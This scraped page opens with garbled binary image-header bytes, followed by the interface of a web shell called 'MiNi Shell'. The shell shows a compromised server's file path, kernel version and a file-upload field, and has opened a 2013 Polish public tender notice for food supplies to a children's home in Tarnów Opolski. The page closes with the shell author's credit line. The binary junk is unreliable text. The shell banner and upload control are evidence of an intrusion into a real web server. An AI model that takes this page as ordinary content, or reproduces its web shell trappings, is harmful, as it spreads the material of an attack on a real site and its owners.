JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/57406-N-2013.html

<p class="kh_header"><b>Tarnów Opolski: Zakup żywności dla potrzeb wychowanków Domu Dziecka
 im. J. Korczaka w Tarnowie Opolskim.</b><br>
<b>Numer ogłoszenia: 57406 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Dziecka im. Janusza Korczaka , ul. Korczaka 1, 46-050 Tarnów Opolski, woj. opolskie, tel. 0 77 46 44 112, faks 0 77 46 44 112.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup żywności dla potrzeb wychowanków Domu Dziecka
 im. J. Korczaka w Tarnowie Opolskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> część I Różne produkty spożywcze:
Określenie przedmiotu zamówienia: ananas w puszce ok. 500 g - 40 szt, brzoskwinia 
w syropie ok. 800 g - 40 szt, budyń różne smaki ok. 35 g - 200 szt, bułka tarta 0,5 kg - 60 szt, cukier 1 kg - 400 kg, ciastka kruche różne - 130 kg, cukier waniliowy ok. 20 g - 100 szt, chrupki kukurydziane ok. 100 g - 200 szt, cukier puder ok. 0,5 kg - 20 szt, cynamon ok. 20 g - 30 szt, dżemy różne smaki niskosłodzone ok. 300 g - 300 szt, groszek zielony konserwowy ok. 400 g - 80 szt, galaretka w proszku różne smaki ok. 80 g - 300 szt, herbata zwykła granulowana 100 g - 70 szt, herbata zwykła expresowa 100 sztuk w opakowaniu - 30 opakowań, herbata owocowa expresowa ok. 30 sztuk w opakowaniu - 60 opakowań, herbata owocowa rozpuszczalna różne smaki ok 300g - 100 szt, kasza jęczmienna 1kg - 30 kg, kasza gryczana 1 kg - 30 kg, kakao rozpuszczalne ok. 350 g - 80 szt, kakao ciemne 100 g - 20 szt, kasza manna 1kg - 20 kg, koncentrat pomidorowy 30%  ok. 170 g - 180 sztuk, kawa zbożowa expresowa ok. 20 sztuk w opakowaniu - 30 opakowań, kawa zbożowa rozpuszczalna ok. 150 g - 20 szt, kisiel różne smaki ok. 40 g - 300 szt, kukurydza w puszce ok. 400 g - 200 szt, kwasek cytrynowy ok. 20 g - 50 szt, ketchup 500 g - 200 szt, konserwa rybna w oleju lub pomidorach ok. 170 g - 150 szt, krem czekoladowy ok. 400 g - 100 szt, liść laurowy ok. 6 g - 30 szt, mąka pszenna typ 500 1 kg - 300 kg, mąka ziemniaczana 1 kg - 30 kg, makaron rosołowy 250 g - 100 szt, makaron świderki i kolanka ok. 500 g - 150 szt, majonez ok. 300 g - 150 szt, majeranek ok. 8 g - 20 szt, musztarda ok. 180 g - 50 szt, miód naturalny wielokwiatowy ok. 400 g - 100 szt, musli owocowe ok. 300 g - 150 szt, olej rzepakowy 1 l - 170 szt, proszek do pieczenia ok. 20 g - 100 szt, płatki owsiane 0,5 kg - 30 szt, płatki kukurydziane ok. 250 g - 200 szt, pasztet drobiowy ok. 130 g - 300 szt, pieprz naturalny mielony ok. 20 g - 60 szt, papryka mielona słodka ok. 20 g - 60 szt, paluszki ok. 80 g - 400 szt, przyprawa bazylia ok. 10 g - 30 sztuk, przyprawa oregano ok. 10 g - 30 szt, paprykarz rybny ok. 130 g - 200 szt, ryż 1 kg - 100 kg, sól 1 kg - 80 kg, sok owocowy wysokosłodzony ok. 420 ml - 100 szt, soki przecierowe owocowe różne smaki ok. 300 ml - 600 szt, suchary ok. 290 g - 30 szt, woda mineralna gazowana i niegazowana 0,5 l - 400 szt, woda mineralna niegazowana 5 l - 50 szt, wafle różne smaki - 70 kg, ziele angielskie ok. 15 g - 30 szt.


część II Pieczywo: 
Określenie przedmiotu zamówienia: bułka zwykła ok. 90 g - 2500 szt, bułka śniadaniowa ok. 70 g - 1200szt, bułka grahamka ok. 70 g - 1200 sztuk, bułka paluch ok. 40 g - 600 szt, bułka weka ok. 400 g - 200 szt, rogal maślany ok. 80 g - 1200 szt, drożdżówka różne nadzienie ok. 90 g - 1000 szt, pączek z marmoladą ok. 90 g - 200 szt, chleb zwykły ok. 1 kg - 800 szt, chleb wieloziarnisty ok. 450 g - 500 szt, chleb razowy ok. 500 g - 500 szt.


część III Mrożonki : 
Określenie przedmiotu zamówienia: filet rybny nieglazurowany miruna - 60 kg, filet rybny nieglazurowany sola - 50 kg, filet rybny glazurowany mintaj - 20 kg, fasolka szparagowa żółta 2,5 kg - 30 kg, fasolka szparagowa zielona 2,5 kg - 30 kg, frytka karbowana do piekarnika 1 kg - 80 kg, kalafior od 2,5 - 5 kg - 30 kg, włoszczyzna paski 4 skł od 2,5 do 5 kg - 300 kg, bukiet warzyw 3-skł brokuł, kalafior, marchewka od 2,5 do 5 kg - 80 kg, mieszanka kompotowa - 250 kg                                 



część IV Mięso i wędliny :
Określenie przedmiotu zamówienia: kiełbasa parówka cienka wp. - 100 kg, kiełbasa śląska wp - 100 kg, kiełbasa szynkowa wp - 50 kg, kiełbasa krakowska sucha - 50 kg, kiełbasa żywiecka - 50 kg, kiełbasa biała parzona wp. - 50 kg, szynka gotowana wp - 50 kg, szynka cygańska - 50 kg, boczek wędzony - 15 kg, słonina świeża - 20 kg, łopatka wp b/k - 200 kg, szynka wp b/k b/s - 50 kg, wołowe gulasz b/k - 50 kg, schab wp z kością - 50 kg, wątroba wp - 30 kg.

część V Nabiał, Mleko i Przetwory Mleczne : 
Określenie przedmiotu zamówienia: jogurt owocowy różne smaki ok. 150 g - 1700 szt, kefir ok. 400 g - 200 szt, masło extra 200 g 82% tłuszczu - 1500 szt, mleko folia 2 % tłuszczu 0,9 l- 4000 szt, maślanka naturalna ok. 350 g - 100 szt, ser żółty ok. 45% tłuszczu - 100 kg, serek topiony 100 g różne smaki - 500 szt, serek homogenizowany różne smaki ok. 125 g - 1300 szt, śmietana 18% tłuszczu ok. 400 g - 400 szt, śmietana kremówka 30% tłuszczu ok. 180 g - 30 szt, twaróg półtłusty - 100 kg.

część VI Jaja : 
Określenie przedmiotu zamówienia: jaja klasa M - 6000 szt. 

część VII Drób mrożony : 
Określenie przedmiotu zamówienia: filet z kurczaka - 50 kg, ćwiartka z kurczaka - 120 kg, porcja rosołowa - 50 kg, skrzydełka z kurcząt - 50 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać uprawnienia do wykonywania dostaw żywności wynikające z właściwego rejestru albo wpisu do ewidencji działalności gospodarczej
Opis sposobu dokonywania oceny spełniania tego warunku:
Oceny spełniania warunku zamawiający dokona sprawdzając kompletność, poprawność i aktualność złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać wiedzę i doświadczenie w zakresie dostawy. Przedstawić referencje w dostawie żywności tzn. co najmniej dwóch dostaw żywności o wartości odpowiadającej co najmniej wartości dostawy przedstawionej w ofercie. 
Opis sposobu dokonywania oceny spełniania tego warunku
Oceny spełniania warunku zamawiający dokona sprawdzając kompletność, poprawność i aktualność złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować sprzętem niezbędnym do dostaw warzyw i owoców. Oświadczenie, że dysponuje transportem samochodowym do przewozu warzyw i owoców spełniający wymogi HACCP.
Opis sposobu dokonywania oceny spełniania tego warunku
Oceny spełniania warunku zamawiający dokona sprawdzając kompletność, poprawność i aktualność złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadcza że, dysponuje osobami posiadającymi uprawnienia do wykonywania prac w procesie produkcji i w obrocie żywnością tzn. posiadającymi aktualne badania lekarskie do wykonywania prac w procesie produkcji i w obrocie żywności.
Opis sposobu dokonywania oceny spełniania tego warunku
Oceny spełniania warunku zamawiający dokona sprawdzając kompletność, poprawność i aktualność złożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień umowy w przypadku zmiany podatku VAT w trakcie trwania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ddtarnowopolski.biuletyn.info.pl        www.domdziecka.tarnowopolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka im. J. Korczaka w Tarnowie Opolskim, 46-050 Tarnów Opolski ,ul. Korczaka 1  od poniedziałku do piątku w godzinach od 7.30 do 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 09:40, miejsce: Dom Dziecka im. J. Korczaka w Tarnowie Opolskim, 46-050 Tarnów Opolski ,ul. Korczaka 1  od poniedziałku do piątku w godzinach od 7.30 do 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne Produkty Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas w puszce ok. 500 g - 40 szt, brzoskwinia 
w syropie ok. 800 g - 40 szt, budyń różne smaki ok. 35 g - 200 szt, bułka tarta 0,5 kg - 60 szt, cukier 1 kg - 400 kg, ciastka kruche różne - 130 kg, cukier waniliowy ok. 20 g - 100 szt, chrupki kukurydziane ok. 100 g - 200 szt, cukier puder ok. 0,5 kg - 20 szt, cynamon ok. 20 g - 30 szt, dżemy różne smaki niskosłodzone ok. 300 g - 300 szt, groszek zielony konserwowy ok. 400 g - 80 szt, galaretka w proszku różne smaki ok. 80 g - 300 szt, herbata zwykła granulowana 100 g - 70 szt, herbata zwykła expresowa 100 sztuk w opakowaniu - 30 opakowań, herbata owocowa expresowa ok. 30 sztuk w opakowaniu - 60 opakowań, herbata owocowa rozpuszczalna różne smaki ok 300g - 100 szt, kasza jęczmienna 1kg - 30 kg, kasza gryczana 1 kg - 30 kg, kakao rozpuszczalne ok. 350 g - 80 szt, kakao ciemne 100 g - 20 szt, kasza manna 1kg - 20 kg, koncentrat pomidorowy 30%  ok. 170 g - 180 sztuk, kawa zbożowa expresowa ok. 20 sztuk w opakowaniu - 30 opakowań, kawa zbożowa rozpuszczalna ok. 150 g - 20 szt, kisiel różne smaki ok. 40 g - 300 szt, kukurydza w puszce ok. 400 g - 200 szt, kwasek cytrynowy ok. 20 g - 50 szt, ketchup 500 g - 200 szt, konserwa rybna w oleju lub pomidorach ok. 170 g - 150 szt, krem czekoladowy ok. 400 g - 100 szt, liść laurowy ok. 6 g - 30 szt, mąka pszenna typ 500 1 kg - 300 kg, mąka ziemniaczana 1 kg - 30 kg, makaron rosołowy 250 g - 100 szt, makaron świderki i kolanka ok. 500 g - 150 szt, majonez ok. 300 g - 150 szt, majeranek ok. 8 g - 20 szt, musztarda ok. 180 g - 50 szt, miód naturalny wielokwiatowy ok. 400 g - 100 szt, musli owocowe ok. 300 g - 150 szt, olej rzepakowy 1 l - 170 szt, proszek do pieczenia ok. 20 g - 100 szt, płatki owsiane 0,5 kg - 30 szt, płatki kukurydziane ok. 250 g - 200 szt, pasztet drobiowy ok. 130 g - 300 szt, pieprz naturalny mielony ok. 20 g - 60 szt, papryka mielona słodka ok. 20 g - 60 szt, paluszki ok. 80 g - 400 szt, przyprawa bazylia ok. 10 g - 30 sztuk, przyprawa oregano ok. 10 g - 30 szt, paprykarz rybny ok. 130 g - 200 szt, ryż 1 kg - 100 kg, sól 1 kg - 80 kg, sok owocowy wysokosłodzony ok. 420 ml - 100 szt, soki przecierowe owocowe różne smaki ok. 300 ml - 600 szt, suchary ok. 290 g - 30 szt, woda mineralna gazowana i niegazowana 0,5 l - 400 szt, woda mineralna niegazowana 5 l - 50 szt, wafle różne smaki - 70 kg, ziele angielskie ok. 15 g - 30 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka zwykła ok. 90 g - 2500 szt, bułka śniadaniowa ok. 70 g - 1200szt, bułka grahamka ok. 70 g - 1200 sztuk, bułka paluch ok. 40 g - 600 szt, bułka weka ok. 400 g - 200 szt, rogal maślany ok. 80 g - 1200 szt, drożdżówka różne nadzienie ok. 90 g - 1000 szt, pączek z marmoladą ok. 90 g - 200 szt, chleb zwykły ok. 1 kg - 800 szt, chleb wieloziarnisty ok. 450 g - 500 szt, chleb razowy ok. 500 g - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet rybny nieglazurowany miruna - 60 kg, filet rybny nieglazurowany sola - 50 kg, filet rybny glazurowany mintaj - 20 kg, fasolka szparagowa żółta 2,5 kg - 30 kg, fasolka szparagowa zielona 2,5 kg - 30 kg, frytka karbowana do piekarnika 1 kg - 80 kg, kalafior od 2,5 - 5 kg - 30 kg, włoszczyzna paski 4 skł od 2,5 do 5 kg - 300 kg, bukiet warzyw 3-skł brokuł, kalafior, marchewka od 2,5 do 5 kg - 80 kg, mieszanka kompotowa - 250 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kiełbasa parówka cienka wp. - 100 kg, kiełbasa śląska wp - 100 kg, kiełbasa szynkowa wp - 50 kg, kiełbasa krakowska sucha - 50 kg, kiełbasa żywiecka - 50 kg, kiełbasa biała parzona wp. - 50 kg, szynka gotowana wp - 50 kg, szynka cygańska - 50 kg, boczek wędzony - 15 kg, słonina świeża - 20 kg, łopatka wp b/k - 200 kg, szynka wp b/k b/s - 50 kg, wołowe gulasz b/k - 50 kg, schab wp z kością - 50 kg, wątroba wp - 30 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał Mleko i Przetwory Mleczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt owocowy różne smaki ok. 150 g - 1700 szt, kefir ok. 400 g - 200 szt, masło extra 200 g 82% tłuszczu - 1500 szt, mleko folia 2 % tłuszczu 0,9 l- 4000 szt, maślanka naturalna ok. 350 g - 100 szt, ser żółty ok. 45% tłuszczu - 100 kg, serek topiony 100 g różne smaki - 500 szt, serek homogenizowany różne smaki ok. 125 g - 1300 szt, śmietana 18% tłuszczu ok. 400 g - 400 szt, śmietana kremówka 30% tłuszczu ok. 180 g - 30 szt, twaróg półtłusty - 100 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja klasa M - 6000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drób mrożony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z kurczaka - 50 kg, ćwiartka z kurczaka - 120 kg, porcja rosołowa - 50 kg, skrzydełka z kurcząt - 50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com